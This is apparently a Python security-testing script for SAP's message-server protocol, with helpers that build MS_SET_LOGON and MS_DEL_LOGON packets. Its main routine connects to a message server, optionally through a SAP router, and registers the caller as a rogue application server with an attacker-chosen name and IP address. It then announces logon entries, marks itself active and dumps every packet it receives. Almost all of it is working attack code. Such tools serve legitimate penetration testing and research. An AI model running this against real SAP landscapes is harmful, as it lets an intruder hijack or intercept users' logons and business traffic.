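def ms_build_set_logon(ptype, serv_info):
    """Build an MS_SET_LOGON request announcing one logon entry of kind *ptype*.

    Args:
        ptype: ``'diag'`` or ``'rfc'``; selects the SAPMSLogon type name and
            which port key of *serv_info* is read.
        serv_info: mapping with ``'ip'``, ``'fqdn'`` and the matching
            ``'diag_port'`` / ``'rfc_port'`` entry.

    Returns:
        A SAPMS request (from ``my_name`` to ``msg_server_name``, both
        module-level names defined outside this block) carrying the
        SAPMSLogon layer, followed by a two-byte Raw trailer.

    Raises:
        ValueError: if *ptype* is neither ``'diag'`` nor ``'rfc'``. The
            previous if/elif left ``logon_type`` and ``port`` unbound for any
            other value and failed later with UnboundLocalError.
        KeyError: if *serv_info* lacks one of the keys listed above.
    """
    # Table form instead of if/elif so an unknown kind is rejected up front,
    # before any field of serv_info is touched.
    logon_kinds = {
        'diag': ('MS_LOGON_DIAG', 'diag_port'),
        'rfc': ('MS_LOGON_RFC', 'rfc_port'),
    }
    if ptype not in logon_kinds:
        raise ValueError("unsupported logon type %r, expected 'diag' or 'rfc'" % (ptype,))
    logon_type, port_key = logon_kinds[ptype]
    port = serv_info[port_key]
    address = serv_info['ip']
    host = serv_info['fqdn']
    # Only the host field carries data in the logon record; the logon name and
    # protocol fields are sent with zero length. misc_length=4 matches the
    # length of the 'LB=9' literal.
    logon = SAPMSLogon(type=logon_type, port=port, address=address,
                       logonname_length=0, prot_length=0,
                       host_length=len(host), host=host,
                       misc_length=4, misc='LB=9')
    p = SAPMS(fromname=my_name, toname=msg_server_name, flag='MS_REQUEST',
              iflag='MS_SEND_NAME', opcode='MS_SET_LOGON',
              logon=logon) / Raw(load="\xff\xff")
    return p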
def ms_build_del_logon_by_type(type):
    """Build an MS_DEL_LOGON request for the logon entry of the given type.

    Args:
        type: SAPMSLogon ``type`` value of the entry to remove. (The parameter
            name shadows the builtin but is kept for caller compatibility.)

    Returns:
        A SAPMS request from ``my_name`` to ``msg_server_name`` (module-level
        names defined outside this block) whose logon layer carries only the
        type; every length field is zero except ``address6_length``.
    """
    # All variable-length fields are empty; address6_length is set to 0xffff.
    # NOTE(review): presumably 0xffff is the "no IPv6 address" sentinel of the
    # protocol — confirm against the SAPMSLogon definition.
    logon_entry = SAPMSLogon(
        type=type,
        logonname_length=0,
        prot_length=0,
        host_length=0,
        misc_length=0,
        address6_length=65535,
    )
    request = SAPMS(
        fromname=my_name,
        toname=msg_server_name,
        flag='MS_REQUEST',
        iflag='MS_SEND_NAME',
        opcode='MS_DEL_LOGON',
        logon=logon_entry,
    )
    return request
def main():
    """Entry point: connect to a message server, register as an application
    server under the command-line supplied name/address, then print every
    packet received until Ctrl-C, and finally send the logout packet.

    All wire values (server name ``options.client``, address
    ``options.logon_address``, target host/port/route) come straight from
    ``parse_options()``; nothing in this function validates them.
    """
    options = parse_options()
    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)
    # Initiate the connection (optionally through a SAP router via route_string)
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port))
    # Set release information
    # NOTE(review): release/patch level are hard-coded literals ("720", 70).
    prop = SAPMSProperty(id=7, release="720", patchno=70, supplvl=0, platform=0)
    p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x43, property=prop)
    print("[*] Setting release information")
    conn.send(p)
    # Perform the login enabling the DIA+BTC+ICM services
    p = SAPMS(flag=0x08, iflag=0x08, msgtype=0x89, toname="-", fromname=options.client)
    print("[*] Sending login packet")
    # The reply is read but discarded: nothing checks whether the login was
    # accepted before the script carries on.
    conn.sr(p)[SAPMS]
    print("[*] Login performed")
    # Changing the status to starting
    p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x05, toname="-", fromname=options.client)
    print("[*] Changing server's status to starting")
    conn.send(p)
    # Set IP address
    p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x06, opcode_version=0x01, change_ip_addressv4=options.logon_address)
    print("[*] Setting IP address")
    response = conn.sr(p)[SAPMS]
    print("[*] IP address set")
    response.show()
    # Set logon information
    # NOTE(review): the logon record uses a fixed type (2), port (3200) and
    # misc "LB=3"; the host field is the command-line server name.
    l = SAPMSLogon(type=2, port=3200, address=options.logon_address, host=options.client, misc="LB=3")
    p = SAPMS(flag=0x01, iflag=0x01, msgtype=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x2b, logon=l)
    print("[*] Setting logon information")
    response = conn.sr(p)[SAPMS]
    print("[*] Logon information set")
    response.show()
    # Set the IP Address property
    prop = SAPMSProperty(client=options.client, id=0x03, address=options.logon_address)
    p = SAPMS(flag=0x02, iflag=0x01, toname="-", fromname=options.client, opcode=0x43, property=prop)
    print("[*] Setting IP address property")
    response = conn.sr(p)[SAPMS]
    print("[*] IP Address property set")
    response.show()
    # Changing the status to active
    p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x01, toname="-", fromname=options.client)
    print("[*] Changing server's status to active")
    conn.send(p)
    # Wait for connections: dump every received SAPMS packet until Ctrl-C.
    # Only KeyboardInterrupt is handled; a recv() error propagates and skips
    # the logout below.
    try:
        while True:
            response = conn.recv()[SAPMS]
            response.show()
    except KeyboardInterrupt:
        print("[*] Cancelled by the user !")
    # Send MS_LOGOUT packet
    # NOTE(review): conn is never closed explicitly; the socket lives until the
    # process exits — TODO confirm whether SAPRoutedStreamSocket needs close().
    p = SAPMS(flag=0x00, iflag=0x04, toname="MSG_SERVER", fromname=options.client)
    print("[*] Sending logout packet")
    conn.send(p)